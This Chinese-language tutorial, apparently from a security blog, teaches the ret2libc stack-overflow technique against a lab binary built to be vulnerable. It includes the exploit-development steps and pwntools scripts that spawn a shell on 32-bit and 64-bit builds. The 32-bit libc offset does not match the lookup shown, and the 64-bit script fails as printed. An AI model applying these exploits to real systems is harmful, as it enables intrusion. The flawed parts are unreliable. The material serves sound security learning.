ret2libc
ret2libc
程序开启nx保护时候,传统的shellcode在栈上不可执行,无法获取 执行shell程序,可以用ret2libc技术。
漏洞程序
#include <stdio.h>
void vuln() {
char buffer[64];
puts("Overflow me");
gets(buffer);
}
int main() {
vuln();
}
gcc vuln.c -o -m32 -fno-stack-protector -no-pie vuln-32
└─$ checksec --file=./vuln-32
[*] '/home/kali/exploits/ret2libc/vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
利用方案
eip直接指向system(’/bin/sh')
确定eip的偏移
[0xf7fe4450]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
[+] SIGNAL 11 errno=0 addr=0x41614141 code=1 si_pid=1096892737 ret=0
[0x41614141]> wopO 0x41614141
76
eip_offset == 76
获取system函数地址
(注意此时是关闭ASLR情况下)
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ldd vuln-32
linux-gate.so.1 (0xf7fc7000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)
/lib/ld-linux.so.2 (0xf7fc9000)
──(kali㉿kali)-[~/exploits/ret2libc]
└─$ readelf -s /lib/i386-linux-gnu/libc.so.6| grep system
3172: 0004c800 55 FUNC WEAK DEFAULT 15 system@@GLIBC_2.0
system_addr == 0xf7c00000 + 0004c800
获取/bin/sh地址
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ strings -tx /lib/i386-linux-gnu/libc.so.6|grep "/bin/sh"
1b5faa /bin/sh
binsh_addr == 0xf7c00000 + 1b5faa
pwn code
from pwn import *
context.binary = ELF('./vuln-32')
p = process()
libc_base = 0xf7c00000
system_addr = libc_base + 0x4c7b0
binsh_addr = libc_base + 0x1b5faa
RET_OFFSET = 76
payload = b'A' * RET_OFFSET
payload += p32(system_addr) # retrun to system == pop eip
payload += p32(0) # [esp] == system's return address,now it's not importance
payload += p32(binsh_addr) # [esp + 4] == system's 1st parameters
p.clean()
p.sendline(payload)
p.interactive()
64位利用方案
x64模式下,参数传递是通过寄存器rdi,rsi,rdx,rcx,r8,r9,所以要使system(‘/bin/sh’)执行,需要{pop rdi ,ret} gadget
获取libc基地址
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ldd vuln-64
linux-vdso.so.1 (0x00007ffff7fc9000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7dce000)
/lib64/ld-linux-x86-64.so.2 (0x00007ffff7fcb000)
获取system偏移地址
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ readelf -s /lib/x86_64-linux-gnu/libc.so.6| grep system
1023: 000000000004c330 45 FUNC WEAK DEFAULT 16 system@@GLIBC_2.2.5
获取/bin/sh偏移地址
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 |grep /bin/sh
196031 /bin/sh
获取rop gadget
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ ROPgadget --binary vuln-64 |grep rdi
0x0000000000401042 : fisubr dword ptr [rdi] ; add byte ptr [rax], al ; push 1 ; jmp 0x401020
0x00000000004010a6 : or dword ptr [rdi + 0x404038], edi ; jmp rax
0x00000000004011cb : pop rdi ; ret
定位rip偏移
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0
[0x00401159]> dr
rsi = 0x00000001
rdi = 0x7ffff7fa1a20
rsp = 0x7fffffffe308
rbp = 0x4141584141574141
rip = 0x00401159
rflags = 0x00010202
orax = 0xffffffffffffffff
[0x00401159]> wopO `dr rbp`
64
rip_offset = rbp_offset + 8 = 72
64bits pwn
from pwn import *
context.binary = ELF('./vuln-64')
libc = 0x00007ffff7dce000
system_offset = 0x4c330
binsh_offset = 0x196031
system = libc + system_offset
binsh = libc + binsh_offset
rop = 0x4011cb
payload = b'A' * 72
payload += p64(rop)
payload += p64(binsh)
payload += p64(system)
payload += p64(0x0)
p.clean()
p.sendline(payload)
p.interactive()
结果有个bug???
┌──(kali㉿kali)-[~/exploits/ret2libc]
└─$ python expvuln64.py
[*] '/home/kali/exploits/ret2libc/vuln-64'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Starting local process './vuln-64': pid 1953037
[*] '/usr/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ ls
[*] Process './vuln-64' stopped with exit code -11 (SIGSEGV) (pid 1953037)
[*] Got EOF while sending in interactive
- 原文作者:winsun
- 原文链接:https://winsun.github.io/fightsec/post/pwn_04_ret2libc/
- 版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议进行许可,非商业转载请注明出处(作者,原文链接),商业转载请联系作者获得授权。